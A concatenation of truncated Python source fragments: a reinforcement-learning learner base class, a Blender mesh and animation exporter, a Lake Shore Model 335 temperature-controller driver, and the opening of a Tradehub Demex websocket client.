Setup hook for base_learner. Hook is the way to implement actual functions in base_learner.
You can reference learner_hook.py
"""
if hasattr(self, '_hooks'):
self._hooks = merge_hooks(self._hooks, build_learner_hook_by_cfg(self._cfg.learner.hook))
else:
self._hooks = build_learner_hook_by_cfg(self._cfg.learner.hook)
def _setup_wrapper(self) -> None:
"""
Overview:
Setup time_wrapper to get data_time and train_time
"""
self._wrapper_timer = EasyTimer()
self._get_iter_data = self.time_wrapper(self._get_iter_data, 'data_time')
self._train = self.time_wrapper(self._train, 'train_time')
def time_wrapper(self, fn: Callable, name: str):
"""
Overview:
Wrap a function and measure the time it used
Arguments:
- fn (:obj:`Callable`): function to be time_wrapped
- name (:obj:`str`): name to be registered in log_buffer
"""
def wrapper(*args, **kwargs) -> Any:
with self._wrapper_timer:
ret = fn(*args, **kwargs)
self._log_buffer[name] = self._wrapper_timer.value
return ret
return wrapper
def _setup_dataloader(self) -> None:
"""
Overview:
Setup learner's dataloader, data_source need to be a generator,
and setup learner's collate_fn, which aggregate a listed data into a batch tensor.
"""
cfg = self._cfg.learner.data
# when single machine version, get_data is set by SingleMachineRunner
# when distributed version, get_data is set by comm LearnerCommHelper
# users don't need to know the related details if not necessary
#self._dataloader = AsyncDataLoader(
# self.get_data, cfg.batch_size, self._device, cfg.chunk_size, self._collate_fn, cfg.num_workers, max_reuse=cfg.max_reuse
#)
self._dataloader = AsyncDataLoader(
data_source=self.get_data,
batch_size=cfg.batch_size,
device=self._device,
learner_uid=self._learner_uid,
url_prefix='http://{}:{}/'.format(self._cfg.system.coordinator_ip, self._cfg.system.coordinator_port),
path_traj=self._cfg.common.path_traj,
collate_fn=self._collate_fn,
num_workers=cfg.num_workers,
use_async=cfg.get('use_async',True),
use_async_cuda=cfg.get('use_async_cuda',True),
max_reuse=cfg.max_reuse,
decompress_type=cfg.get('decompress_type','none')
)
def _get_iter_data(self) -> Any:
return next(self._dataloader)
@abstractmethod
def _setup_agent(self) -> None:
"""
Overview:
Setup learner's runtime agent, agent is the subclass instance of `BaseAgent`.
There may be more than one agent.
Note:
`agent` is the wrapped `model`, it can be wrapped with different plugins to satisfy
different runtime usages (e.g. actor and learner would use the model differently)
"""
raise NotImplementedError
@abstractmethod
def _setup_computation_graph(self) -> None:
"""
Overview:
Setup computation_graph, which uses procssed data and agent to get an optimization
computation graph.
"""
raise NotImplementedError
def _setup_optimizer(self) -> None:
"""
Overview:
Setup learner's optimizer and lr_scheduler
"""
self._optimizer = torch.optim.Adam(
self._agent.model.parameters(),
lr=self._cfg.learner.learning_rate,
weight_decay=self._cfg.learner.weight_decay
)
self._lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(self._optimizer, milestones=[], gamma=1)
def _train(self, data: Any) -> None:
"""
Overview:
Train the input data for 1 iteration, called in ``run`` which involves:
- forward
- backward
- sync grad (if in distributed mode)
- parameter update
Arguments:
- data (:obj:`Any`): data used for training
"""
with self._timer:
log_vars = self._computation_graph.forward(data, self._agent)
loss = log_vars['total_loss']
self._log_buffer['forward_time'] = self._timer.value
with self._timer:
self._optimizer.zero_grad()
loss.backward()
if self._use_distributed:
self._agent.model.sync_gradients()
self._optimizer.step()
grad = self._optimizer.get_grad()
self._log_buffer['backward_time'] = self._timer.value
self._log_buffer['grad'] = grad
self._log_buffer.update(log_vars)
def register_stats(self) -> None:
"""
Overview:
register some basic attributes to record & tb_logger(e.g.: cur_lr, data_time, train_time),
register the attributes related to computation_graph to record & tb_logger.
"""
self._record.register_var('cur_lr')
self._record.register_var('data_time')
self._record.register_var('train_time')
self._record.register_var('forward_time')
self._record.register_var('backward_time')
self._tb_logger.register_var('cur_lr')
self._tb_logger.register_var('data_time')
self._tb_logger.register_var('train_time')
self._tb_logger.register_var('forward_time')
self._tb_logger.register_var('backward_time')
self._computation_graph.register_stats(self._record, self._tb_logger)
def register_hook(self, hook: LearnerHook) -> None:
"""
Overview:
Add a new hook to learner.
Arguments:
- hook (:obj:`LearnerHook`): the hook to be added to learner
"""
add_learner_hook(self._hooks, hook)
@auto_checkpoint
def run(self, max_iterations: Union[int, None] = None) -> None:
"""
Overview:
Run the learner.
For each iteration, learner will get training data and train.
Learner will call hooks at four fixed positions(before_run, before_iter, after_iter, after_run).
Arguments:
- max_iterations (:obj:`int`): the max run iteration, if None then set to default_max_iterations
"""
if max_iterations is None:
max_iterations = self._default_max_iterations
# before run hook
self.call_hook('before_run')
for _ in range(max_iterations):
data = self._get_iter_data()
# before iter hook
self.call_hook('before_iter')
self._train(data)
# after iter hook
self.call_hook('after_iter')
self._last_iter.add(1)
# after run hook
self.call_hook('after_run')
def close(self) -> None:
"""
Overview:
Close the related resources, such as dist_finalize when use_distributed
"""
if self._use_distributed:
dist_finalize()
def call_hook(self, name: str) -> None:
"""
Overview:
Call the corresponding hook plugins according to name
Arguments:
- name (:obj:`str`): hooks in which position to call, \
should be in ['before_run', 'after_run', 'before_iter', 'after_iter']
"""
for hook in self._hooks[name]:
hook(self)
def info(self, s: str) -> None:
"""
Overview:
Log string info by ``self._logger.info``
Arguments:
- s (:obj:`str`): the message to add into the logger
"""
self._logger.info(s)
def save_checkpoint(self) -> None:
"""
Overview:
Automatically save checkpoints.
Directly call ``save_ckpt_after_run`` hook instead of calling ``call_hook`` function.
Note:
This method is called by `auto_checkpoint` function in `checkpoint_helper.py`,
designed for saving checkpoint whenever an exception raises.
"""
names = [h.name for h in self._hooks['after_run']]
assert 'save_ckpt_after_run' in names
idx = names.index('save_ckpt_after_run')
self._hooks['after_run'][idx](self)
@property
def last_iter(self) -> CountVar:
return self._last_iter
@property
def optimizer(self) -> torch.optim.Optimizer:
return self._optimizer
@property
def lr_scheduler(self) -> torch.optim.lr_scheduler._LRScheduler:
return self._lr_scheduler
@property
def computation_graph(self) -> Any:
return self._computation_graph
@property
def agent(self) -> 'BaseAgent': # noqa
return self._agent
@property
def log_buffer(self) -> dict: # LogDict
return self._log_buffer
@log_buffer.setter
def log_buffer(self, _log_buffer: dict) -> None:
self._log_buffer = _log_buffer
@property
def record(self) -> 'VariableRecord': # noqa
return self._record
@property
def load_path(self) -> str:
return self._load_path
@load_path.setter
def load_path(self, _load_path: str) -> None:
self._load_path = _load_path
@property
def save_path(self) -> str:
return self._save_path
@property
def checkpoint_manager(self) -> Any:
return self._checkpointer_manager
@property
def name(self) -> str:
return self._name + str(id(self))
@property
def rank(self) -> int:
return self._rank
@property
def tb_logger(self) -> 'TensorBoardLogger': # noqa
return self._tb_logger
@property
def use_distributed(self) -> bool:
return self._use_distributed
learner_mapping = {}
def register_learner(name: str, learner: type) -> None:
"""
Overview:
Add a new Learner class with its name to dict learner_mapping, any subclass derived from BaseLearner must
use this function to register in ctools system before instantiate.
Arguments:
- name (:obj:`str`): name of the new Learner
- learner (:obj:`type`): the new Learner class, should be subclass of BaseLearner
"""
assert isinstance(name, str)
assert issubclass(learner, BaseLearner)
learner_mapping[name] = learner
def create_learner(cfg: EasyDict) -> BaseLearner:
"""
Overview:
Given the key(learner_type/name), create a new learner instance if in learner_mapping's values,
or raise an KeyError. In other words, a derived learner must first register then | |
"""
TODO:
Vertex Color
Tangent Space
V Flip
Normalize Bone Weights
Specify Axis Change
"""
import bpy
import struct
from enum import Enum
class VertexAttributeUsage(Enum):
POSITION = 0
TEXTURE_COORDINATE = 1
NORMAL = 2
COLOR = 3
BINORMAL = 4
TANGENT = 5
BONE_WEIGHTS = 6
BONE_INDICES = 7
CUSTOM = 8
class VertexElementFlags(Enum):
NONE = 0x00
FLOAT = 0x01
UNSIGNED = 0x02
NORMALIZED = 0x04
class VertexElement:
def __init__(self,
componentSize = 4, componentCount = 3,
usage = VertexAttributeUsage.POSITION, index = 0,
flags = VertexElementFlags.FLOAT, offset = 0):
# Fill all vertex element data
self.offset = offset
self.componentSize = componentSize
self.componentCount = componentCount
self.usage = usage
self.index = index
self.flags = flags
class MeshExportSettings:
def __init__(self):
self.exportNormals = False
self.exportTextures = False
self.exportTangentSpace = False
self.exportVFlipped = False
self.exportBoneWeights = False
self.exportBinary = True
def getVertexElementsAndSize(mesh, settings):
# Find all the vertex elements in the mesh (position if always a given)
vertexElements = [VertexElement(4, 3, VertexAttributeUsage.POSITION, 0, VertexElementFlags.FLOAT, 0)]
# Exporting normals is an option
if settings.exportNormals:
vertexElements.append(VertexElement(4, 3, VertexAttributeUsage.NORMAL, 0, VertexElementFlags.FLOAT, 0))
# Export textures if they exist and are desired
if settings.exportTextures:
for i, uvl in enumerate(mesh.uv_layers):
vertexElements.append(VertexElement(4, 2, VertexAttributeUsage.TEXTURE_COORDINATE, i, VertexElementFlags.FLOAT, 0))
# Export tangent space for the first texture
if settings.exportTangentSpace and (len(mesh.uv_layers) > 0):
vertexElements.append(VertexElement(4, 3, VertexAttributeUsage.TANGENT, 0, VertexElementFlags.FLOAT, 0))
vertexElements.append(VertexElement(4, 3, VertexAttributeUsage.BINORMAL, 0, VertexElementFlags.FLOAT, 0))
# Export animation information (bone weights and indices)
if settings.exportBoneWeights:
vertexElements.append(VertexElement(4, 4, VertexAttributeUsage.BONE_WEIGHTS, 0, VertexElementFlags.FLOAT, 0))
vertexElements.append(VertexElement(2, 4, VertexAttributeUsage.BONE_INDICES, 0, VertexElementFlags.UNSIGNED, 0))
# Calculate vertex struct size and place offsets
vertexSize = 0
for element in vertexElements:
element.offset = vertexSize
vertexSize += element.componentSize * element.componentCount
return (vertexElements, vertexSize)
def getVertexIndex(map, elementInds):
key = tuple(elementInds)
if key in map:
return map[key]
else:
idx = len(map)
map[key] = idx
return idx
def getUnique(map, key):
if key in map:
return map[key]
else:
idx = len(map)
map[key] = idx
return idx
def getTris(loops):
inds = [loops[0], loops[1], loops[2]]
yield tuple(inds)
i = 3
while i < len(loops):
inds[1] = inds[2]
inds[2] = loops[i]
i += 1
yield tuple(inds)
def insertWeighting(l, w):
for i, w2 in enumerate(l):
if w[1] > w2[1]:
return l[:i] + [w] + l[i:3]
return l
def getAllUniqueVertexIndices(context, mesh, ne, settings):
def vec2key(v):
return (round(v[0], 4), round(v[1], 4))
# Return data
vd = {}
uvDicts = [{} for uvl in mesh.uv_layers] if settings.exportTextures else []
animL = [[(0,0.0), (0,0.0), (0,0.0), (0,0.0)] for vertex in mesh.vertices] if settings.exportBoneWeights else []
tris = []
# Used as a key for vertex information
index = [0] * ne
# Loop through all the triangles
ti = 0
for polyIndex, poly in enumerate(mesh.polygons):
for tri in getTris(poly.loop_indices):
# Loop through triangle vertices
inds = [0, 0, 0]
for vti, vert in enumerate(tri):
vi = mesh.loops[vert].vertex_index
ii = 0
# Position index
index[ii] = vi
ii += 1
# Normal index
if settings.exportNormals:
normIndex = vi if poly.use_smooth else -(polyIndex + 1)
index[ii] = normIndex
ii += 1
# UV index
if settings.exportTextures:
for i, uvl in enumerate(mesh.uv_layers):
uvk = vec2key(uvl.data[vert].uv)
index[ii] = getUnique(uvDicts[i], uvk)
ii += 1
# Export tangent space for the first texture
if settings.exportTangentSpace and (len(mesh.uv_layers) > 0):
index[ii] = ti # TODO: Fix this
ii += 1
# Animation index
if settings.exportBoneWeights:
# Bone information is unique to the vertex
index[ii] = vi
ii += 1
index[ii] = vi
ii += 1
inds[vti] = getVertexIndex(vd, index)
# Add a triangle
tris.append(tuple(inds))
ti += 1
# Compute bone weight information here
if settings.exportBoneWeights:
object = context.object
armature = [obj for obj in context.selected_objects if obj != object][0]
for vertex in mesh.vertices:
for group in vertex.groups:
if group.weight > 0:
weight = object.vertex_groups[group.group].weight(vertex.index) * group.weight
boneIndex = [i for i, bone in enumerate(armature.data.bones) if bone.name == object.vertex_groups[group.group].name][0]
print('%s - %d' % (object.vertex_groups[group.group].name, boneIndex))
animL[vertex.index] = insertWeighting(animL[vertex.index], (boneIndex, weight))
# Normalize weights
normFactor = animL[vertex.index][0][1] + animL[vertex.index][1][1] + animL[vertex.index][2][1] + animL[vertex.index][3][1]
for i in [0,1,2,3]:
animL[vertex.index][i] = (animL[vertex.index][i][0], animL[vertex.index][i][1] / normFactor)
# Convert to list form
vl = [None] * len(vd)
uvl = [[None] * len(uvd) for uvd in uvDicts]
for key, val in vd.items():
vl[val] = key
for i, uvd in enumerate(uvDicts):
for key, val in uvd.items():
uvl[i][val] = key
return (vl, uvl, animL, tris)
def writeMesh(context, filepath, settings):
# Grab mesh for export
mesh = context.object.data
# Get vertex element information
vertexElements, vertexSize = getVertexElementsAndSize(mesh, settings)
numElements = len(vertexElements)
# Get mesh data
vList, uvLists, animL, tris = getAllUniqueVertexIndices(context, mesh, len(vertexElements), settings)
if settings.exportBinary:
# Open the file in binary mode
f = open(filepath, 'wb')
# Write header
f.write(struct.pack('<4s', bytes('VRAW','utf-8')))
# Write vertex elements
f.write(struct.pack('<I', len(vertexElements)))
for element in vertexElements:
f.write(struct.pack('<HBBBB',
element.offset,
element.componentSize,
element.componentCount,
(element.index << 4) | element.usage.value,
element.flags.value
))
# Write index size
f.write(struct.pack('<I', 4))
# Write vertex data
f.write(struct.pack('<I', len(vList)))
for vertKey in vList:
for i, ve in enumerate(vertexElements):
if ve.usage == VertexAttributeUsage.POSITION:
pos = mesh.vertices[vertKey[i]].co
f.write(struct.pack('<fff', pos[0], pos[1], pos[2]))
elif ve.usage == VertexAttributeUsage.NORMAL:
ni = vertKey[i]
normal = mesh.vertices[ni].normal if ni >= 0 else mesh.polygons[-ni - 1].normal
f.write(struct.pack('<fff', normal[0], normal[1], normal[2]))
elif ve.usage == VertexAttributeUsage.TEXTURE_COORDINATE:
uv = uvLists[ve.index][vertKey[i]]
f.write(struct.pack('<ff', uv[0], uv[1]))
elif ve.usage == VertexAttributeUsage.BONE_WEIGHTS:
weights = animL[vertKey[i]]
f.write(struct.pack('<ffff', weights[0][1], weights[1][1], weights[2][1], weights[3][1]))
elif ve.usage == VertexAttributeUsage.BONE_INDICES:
weights = animL[vertKey[i]]
f.write(struct.pack('<HHHH', weights[0][0], weights[1][0], weights[2][0], weights[3][0]))
# Write index data
f.write(struct.pack('<I', len(tris) * 3))
for tri in tris:
f.write(struct.pack('<III', tri[0], tri[1], tri[2]))
# Close file
f.close()
else:
# Open the file in text mode with added YAML extension
f = open(filepath + '.yml', 'w', encoding='utf-8')
# Write vertex elements
f.write("VertexElements:\n")
for element in vertexElements:
f.write(' - Offset: %d\n' % (element.offset))
f.write(' CompSize: %d\n' % (element.componentSize))
f.write(' CompCount: %d\n' % (element.componentCount))
f.write(' UsageType: %s\n' % (element.usage.name))
f.write(' UsageIndex: %d\n' % (element.index))
f.write(' Flags: %d\n' % (element.flags.value))
# Write vertex data
f.write("Vertices:\n")
for vertKey in vList:
for i, ve in enumerate(vertexElements):
f.write(' - ' if i == 0 else ' ')
if ve.usage == VertexAttributeUsage.POSITION:
pos = mesh.vertices[vertKey[i]].co
f.write('Position%d: [%f,%f,%f]\n' % (ve.index, pos[0], pos[1], pos[2]))
elif ve.usage == VertexAttributeUsage.NORMAL:
ni = vertKey[i]
normal = mesh.vertices[ni].normal if ni >= 0 else mesh.polygons[-ni - 1].normal
f.write('Normal%d: [%f,%f,%f]\n' % (ve.index, normal[0], normal[1], normal[2]))
elif ve.usage == VertexAttributeUsage.TEXTURE_COORDINATE:
uv = uvLists[ve.index][vertKey[i]]
f.write('TexCoord%d: [%f,%f]\n' % (ve.index, uv[0], uv[1]))
elif ve.usage == VertexAttributeUsage.BONE_WEIGHTS:
weights = animL[vertKey[i]]
f.write('BWeights%d: [%f,%f,%f,%f]\n' % (ve.index, weights[0][1], weights[1][1], weights[2][1], weights[3][1]))
elif ve.usage == VertexAttributeUsage.BONE_INDICES:
weights = animL[vertKey[i]]
f.write('BIndices%d: [%d,%d,%d,%d]\n' % (ve.index, weights[0][0], weights[1][0], weights[2][0], weights[3][0]))
# Write index data
f.write("Triangles:\n")
for tri in tris:
f.write(' - [%d,%d,%d]\n' % (tri[0], tri[1], tri[2]))
# Close file
f.close()
return {'FINISHED'}
def getKeyframes(context, object):
# Deselect all bones
for bone in object.data.bones:
bone.select = False
keyframes = [[] for bone in object.data.bones]
for i, bone in enumerate(object.data.bones):
bone.select = True
bpy.ops.screen.frame_jump(0)
context.scene.update()
context.scene.frame_set(context.scene.frame_current)
keyframes[i].append(context.scene.frame_current)
while {'FINISHED'} == bpy.ops.screen.keyframe_jump():
context.scene.update()
context.scene.frame_set(context.scene.frame_current)
keyframes[i].append(context.scene.frame_current)
bone.select = False
return keyframes
def writeSkeleton(context, filepath, exportBinary):
# Get the armature
object = bpy.context.object
# TODO: Make sure we're not in POSE mode
if object.mode != 'POSE':
bpy.ops.object.posemode_toggle()
# Obtain the keyframes
keyframes = getKeyframes(context, object)
if exportBinary:
# Open the file in binary mode
f = open(filepath, 'wb')
# Write header
f.write(b'ANIM')
# Write all the bones
f.write(struct.pack('<I', len(object.pose.bones)))
for boneIndex, bone in enumerate(object.pose.bones):
# Write bone name and parent
f.write(struct.pack('<I', len(bone.name)))
f.write(bytes(bone.name, 'ASCII'))
if bone.parent:
f.write(struct.pack('<I', len(bone.parent.name)))
f.write(bytes(bone.parent.name, 'ASCII'))
else:
f.write(struct.pack('<I', 0))
# Write bone rest pose
object.data.pose_position = 'REST'
context.scene.update()
rotation = bone.matrix.to_quaternion()
f.write(struct.pack('<ffff', rotation[1], rotation[2], rotation[3], rotation[0]))
matrix = bone.matrix
f.write(struct.pack('<fff', matrix[0][3], matrix[1][3], matrix[2][3]))
object.data.pose_position = 'POSE'
context.scene.update()
# Write all keyframes for the bone
f.write(struct.pack('<I', len(keyframes[boneIndex])))
for frame in keyframes[boneIndex]:
# Move to animation frame
bpy.context.scene.frame_set(frame)
bpy.context.scene.update()
# Write frame and pose matrix
f.write(struct.pack('<i', frame))
rotation = bone.matrix.to_quaternion()
f.write(struct.pack('<ffff', rotation[1], rotation[2], rotation[3], rotation[0])) | |
"""Implements functionality unique to the Lake Shore Model 335 cryogenic temperature controller"""
from enum import IntEnum
from .temperature_controllers import TemperatureController, InstrumentException
from .temperature_controllers import RelayControlMode, RelayControlAlarm, InterfaceMode, HeaterError, \
CurveFormat, CurveTemperatureCoefficient, BrightnessLevel, AutotuneMode, HeaterResistance, Polarity, \
DiodeCurrent, HeaterOutputUnits, InputSensorUnits, ControlTypes, StandardEventRegister, OperationEvent, RegisterBase
Model335RelayControlMode = RelayControlMode
Model335RelayControlAlarm = RelayControlAlarm
Model335InterfaceMode = InterfaceMode
Model335HeaterError = HeaterError
Model335CurveFormat = CurveFormat
Model335CurveTemperatureCoefficient = CurveTemperatureCoefficient
Model335BrightnessLevel = BrightnessLevel
Model335AutoTuneMode = AutotuneMode
Model335HeaterResistance = HeaterResistance
Model335Polarity = Polarity
Model335DiodeCurrent = DiodeCurrent
Model335HeaterOutputUnits = HeaterOutputUnits
Model335InputSensorUnits = InputSensorUnits
Model335ControlTypes = ControlTypes
Model335StandardEventRegister = StandardEventRegister
Model335OperationEvent = OperationEvent
class Model335InputSensor(IntEnum):
"""Enumeration when "NONE" is an option for sensor input"""
NONE = 0
CHANNEL_A = 1
CHANNEL_B = 2
class Model335MonitorOutUnits(IntEnum):
"""Units associated with a sensor channel"""
KELVIN = 1
CELSIUS = 2
SENSOR = 3
class Model335InputSensorType(IntEnum):
"""Sensor type enumeration"""
DISABLED = 0
DIODE = 1
PLATINUM_RTD = 2
NTC_RTD = 3
THERMOCOUPLE = 4
class Model335DiodeRange(IntEnum):
"""Diode voltage range enumeration"""
TWO_POINT_FIVE_VOLTS = 0
TEN_VOLTS = 1
class Model335RTDRange(IntEnum):
"""RTD resistance range enumeration"""
TEN_OHM = 0
THIRTY_OHM = 1
HUNDRED_OHM = 2
THREE_HUNDRED_OHM = 3
ONE_THOUSAND_OHM = 4
THREE_THOUSAND_OHM = 5
TEN_THOUSAND_OHM = 6
THIRTY_THOUSAND_OHM = 7
ONE_HUNDRED_THOUSAND_OHM = 8
class Model335ThermocoupleRange(IntEnum):
"""Thermocouple range enumeration"""
FIFTY_MILLIVOLT = 0
class Model335InputSensorSettings:
"""Class object used in the get/set_input_sensor methods"""
def __init__(self, sensor_type, autorange_enable, compensation, units, input_range=None):
"""Constructor for the InputSensor class
Args:
sensor_type (Model335InputSensorType):
* Specifies input sensor type
autorange_enable (bool):
* Specifies autoranging
* False = off and True = on
compensation (bool):
* Specifies input compensation
* False = off and True = on
units (Model335InputSensorUnits):
* Specifies the preferred units parameter for sensor readings and for the control setpoint
input_range (IntEnum)
* Specifies input range if autorange_enable is false
* See IntEnum classes:
* Model335DiodeRange
* Model335RTDRange
* Model335ThermocoupleRange
"""
self.sensor_type = sensor_type
self.autorange_enable = autorange_enable
self.compensation = compensation
self.units = units
self.input_range = input_range
class Model335HeaterOutType(IntEnum):
"""Heater output 2 enumeration"""
CURRENT = 0
VOLTAGE = 1
class Model335HeaterOutputDisplay(IntEnum):
"""Heater output display units enumeration"""
CURRENT = 1
POWER = 2
class Model335HeaterOutputMode(IntEnum):
"""Control loop enumeration"""
OFF = 0
CLOSED_LOOP = 1
ZONE = 2
OPEN_LOOP = 3
MONITOR_OUT = 4
WARMUP_SUPPLY = 5
class Model335WarmupControl(IntEnum):
"""Heater output 2 voltage mode warmup enumerations"""
AUTO_OFF = 0
CONTINUOUS = 1
class Model335HeaterRange(IntEnum):
"""Control loop heater range enumeration"""
OFF = 0
LOW = 1
MEDIUM = 2
HIGH = 3
class Model335ControlLoopZoneSettings:
"""Control loop configuration for a particular heater output and zone"""
def __init__(self, upper_bound, proportional, integral, derivative, manual_output_value,
heater_range, channel, ramp_rate):
"""Constructor
Args:
upper_bound (float):
* Specifies the upper Setpoint boundary of this zone in kelvin
proportional (float):
* Specifies the proportional gain for this zone
* 0.1 to 1000
integral (float):
* Specifies the integral gain for this zone
* 0.1 to 1000
derivative (float):
* Specifies the derivative gain for this zone
* 0 to 200 %
manual_output_value (float):
* Specifies the manual output for this zone
* 0 to 100 %
heater_range (Model335HeaterRange):
* Specifies the heater range for this zone
* See Model335HeaterRange IntEnum class
channel (Model335InputSensor):
* See Model335InputSensor IntEnum class
ramp_rate (float):
* Specifies the ramp rate for this zone
* 0 - 100 K/min
"""
self.upper_bound = upper_bound
self.proportional = proportional
self.integral = integral
self.derivative = derivative
self.manual_output_value = manual_output_value
self.heater_range = heater_range
self.channel = channel
self.ramp_rate = ramp_rate
class Model335DisplaySetup(IntEnum):
"""Panel display setup enumeration"""
INPUT_A = 0
INPUT_A_MAX_MIN = 1
TWO_INPUT_A = 2
INPUT_B = 3
INPUT_B_MAX_MIN = 4
TWO_INPUT_B = 5
CUSTOM = 6
TWO_LOOP = 7
class Model335HeaterVoltageRange(IntEnum):
"""Voltage mode heater enumerations"""
VOLTAGE_OFF = 0
VOLTAGE_ON = 1
class Model335DisplayInputChannel(IntEnum):
"""Panel display information enumeration"""
NONE = 0
INPUT_A = 1
INPUT_B = 2
SETPOINT_1 = 3
SETPOINT_2 = 4
OUTPUT_1 = 5
OUTPUT_2 = 6
class Model335DisplayFieldUnits(IntEnum):
"""Panel display units enumeration"""
KELVIN = 1
CELSIUS = 2
SENSOR_UNITS = 3
MINIMUM_DATA = 4
MAXIMUM_DATA = 5
SENSOR_NAME = 6
class Model335StatusByteRegister(RegisterBase):
"""Class object representing the status byte register LSB to MSB"""
bit_names = [
"",
"",
"",
"",
"message_available_summary_bit",
"event_status_summary_bit",
"service_request",
"operation_summary_bit"
]
def __init__(self,
message_available_summary_bit,
event_status_summary_bit,
service_request,
operation_summary_bit):
self.message_available_summary_bit = message_available_summary_bit
self.event_status_summary_bit = event_status_summary_bit
self.service_request = service_request
self.operation_summary_bit = operation_summary_bit
class Model335ServiceRequestEnable(RegisterBase):
"""Class object representing the service request enable register LSB to MSB"""
bit_names = [
"",
"",
"",
"",
"message_available_summary_bit",
"event_status_summary_bit",
"",
"operation_summary_bit"
]
def __init__(self,
message_available_summary_bit,
event_status_summary_bit,
operation_summary_bit):
self.message_available_summary_bit = message_available_summary_bit
self.event_status_summary_bit = event_status_summary_bit
self.operation_summary_bit = operation_summary_bit
class Model335InputReadingStatus(RegisterBase):
"""Class object representing the input status flag bits"""
bit_names = [
"invalid_reading",
"",
"",
"",
"temp_underrange",
"temp_overrange",
"sensor_units_zero",
"sensor_units_overrange"
]
def __init__(self, invalid_reading, temp_underrange, temp_overrange, sensor_units_zero, sensor_units_overrange):
self.invalid_reading = invalid_reading
self.temp_underrange = temp_underrange
self.temp_overrange = temp_overrange
self.sensor_units_zero = sensor_units_zero
self.sensor_units_overrange = sensor_units_overrange
class Model335(TemperatureController):
"""A class object representing the Lake Shore Model 335 cryogenic temperature controller"""
# Initiate enum types for temperature controllers
_input_channel_enum = Model335DisplayInputChannel
_display_units_enum = Model335DisplayFieldUnits
# Initiate instrument specific registers
_status_byte_register = Model335StatusByteRegister
_service_request_enable = Model335ServiceRequestEnable
vid_pid = [(0x1FB9, 0x0300)]
def __init__(self,
baud_rate,
serial_number=None,
com_port=None,
timeout=2.0,
ip_address=None,
tcp_port=None,
**kwargs):
# Call the parent init, then fill in values specific to the 335
TemperatureController.__init__(self, serial_number, com_port, baud_rate, timeout, ip_address,
tcp_port, **kwargs)
# Disable emulation mode
self._disable_emulation()
# Alias specific temperature controller methods
get_analog_output_percentage = TemperatureController._get_analog_output_percentage
set_autotune = TemperatureController._set_autotune
set_brightness = TemperatureController._set_brightness
get_brightness = TemperatureController._get_brightness
get_operation_condition = TemperatureController._get_operation_condition
get_operation_event_enable = TemperatureController._get_operation_event_enable
set_operation_event_enable = TemperatureController._set_operation_event_enable
get_operation_event = TemperatureController._get_operation_event
get_thermocouple_junction_temp = TemperatureController._get_thermocouple_junction_temp
set_soft_cal_curve_dt_470 = TemperatureController._set_soft_cal_curve_dt_470
set_soft_cal_curve_pt_100 = TemperatureController._set_soft_cal_curve_pt_100
set_soft_cal_curve_pt_1000 = TemperatureController._set_soft_cal_curve_pt_1000
set_diode_excitation_current = TemperatureController._set_diode_excitation_current
get_diode_excitation_current = TemperatureController._get_diode_excitation_current
get_tuning_control_status = TemperatureController._get_tuning_control_status
set_filter = TemperatureController._set_filter
get_filter = TemperatureController._get_filter
def set_monitor_output_heater(self, channel, high_value, low_value, units=Model335MonitorOutUnits.KELVIN,
polarity=Model335Polarity.UNIPOLAR):
"""Configures output 2. Use the set_heater_output_mode command to set the output mode to Monitor Out.
Args:
channel (Model335InputSensor):
* Specifies which sensor input to monitor
high_value (float):
* Represents the data at which the Monitor Out reaches +100% output
* Entered in the units designated by the <units> argument
low_value (float):
* Represents the data at which the analog output reaches -100% output if bipolar,
* or 0% outputif unipolar. Entered in the units designated by the <units> argument
units (Model335MonitorOutUnits):
* Specifies the units on which to base the output voltage
polarity (Model335Polarity):
* Specifies output voltage is unipolar or bipolar
"""
self.command("ANALOG 2,{},{},{},{},{}".format(channel, units, high_value, low_value, polarity))
def get_monitor_output_heater(self):
"""Used to obtain all monitor out parameters for output 2.
Return:
(dict):
* See set_monitor_output_heater method arguments
* Keys:
* "channel": Model335InputSensor
* "units": Model335MonitorOutUnits
* "high_value": float
* "low_value": float
* "polarity": Model335Polarity
"""
parameters = self.query("ANALOG? 2").split(",")
return {"channel": Model335InputSensor(int(parameters[0])),
"units": Model335MonitorOutUnits(int(parameters[1])),
"high_value": float(parameters[2]),
"low_value": float(parameters[3]),
"polarity": Model335Polarity(int(parameters[4]))}
def get_celsius_reading(self, channel):
"""Returns the temperature value in celsius of either channel.
Args:
channel (str):
* Selects the sensor input to query
* "A" or "B"
"""
return float(self.query("CRDG? {}".format(channel)))
def set_display_setup(self, mode):
"""Sets the display mode
Args:
mode (Model335DisplaySetup):
* Specifies the front panel display mode
* See Model335DisplaySetup IntEnum class
"""
self.command("DISPLAY {}".format(mode))
def get_display_setup(self):
"""Returns the display mode
Return:
(Model335DisplaySetup):
* Specifies the front panel display mode
* See Model335DisplaySetup IntEnum class
"""
return Model335DisplaySetup(int(self.query("DISPLAY?")))
def set_heater_setup_one(self, heater_resistance, max_current, output_display_mode):
"""Method to configure heater output one.
Args:
heater_resistance (Model335HeaterResistance):
* See Model335HeaterResistance IntEnum class
max_current (float):
* Specifies the maximum current for the heater
output_display_mode (Model335HeaterOutputDisplay):
* Specifies how the heater output is displayed
* See Model335HeaterOutType IntEnum class
"""
self.command("HTRSET 1,0,{},0,{},{}".format(heater_resistance, max_current, output_display_mode))
def set_heater_setup_two(self, output_type, heater_resistance, max_current, display_mode):
"""Method to configure the heater output 2.
Args:
output_type (Model335HeaterOutType):
* Specifies wheter the heater output is in constant current or voltage mode
* See Model335HeaterOutType IntEnum class
heater_resistance (Model335HeaterResistance):
* See Model335HeaterResistance IntEnum class
max_current (float):
* Specifies the maximum current for the heater
display_mode (Model335HeaterOutType):
* Specifies how the heater output is displayed
* Required only if output_type is set to CURRENT
* See Model335HeaterOutType IntEnum class
"""
self.command("HTRSET 2,{},{},0,{},{}".format(output_type, heater_resistance, max_current, display_mode))
def get_heater_setup(self, heater_output):
"""Returns the heater configuration status.
Args:
heater_output (int)
* Selects which heater output to query
Return:
(dict):
* See set_heater_setup_one/set_heater_setup_two method arguments
* Keys:
* "output_type": Model335HeaterOutType
* "heater_resistance": Model335HeaterResistance
* "max_current": float
* "output_display_mode": Model335HeaterOutputDisplay
"""
heater_setup = self.query("HTRSET? {}".format(heater_output)).split(",")
| |
<reponame>Mai-Te-Pora/tradehub-python
from typing import Optional, List, Callable
import websockets
import json
class DemexWebsocket:
"""
DemexWebsocket is a high-level async implementation off the official Tradehub Demex websocket and provides all
functionalities described in the documentation.
"""
def __init__(self, uri: str, ping_interval: Optional[int] = 10, ping_timeout: Optional[int] = 30):
"""
Create a websocket which is complaint with the specification provided by the offical documentation.
.. see::
https://docs.switcheo.org/#/?id=websocket
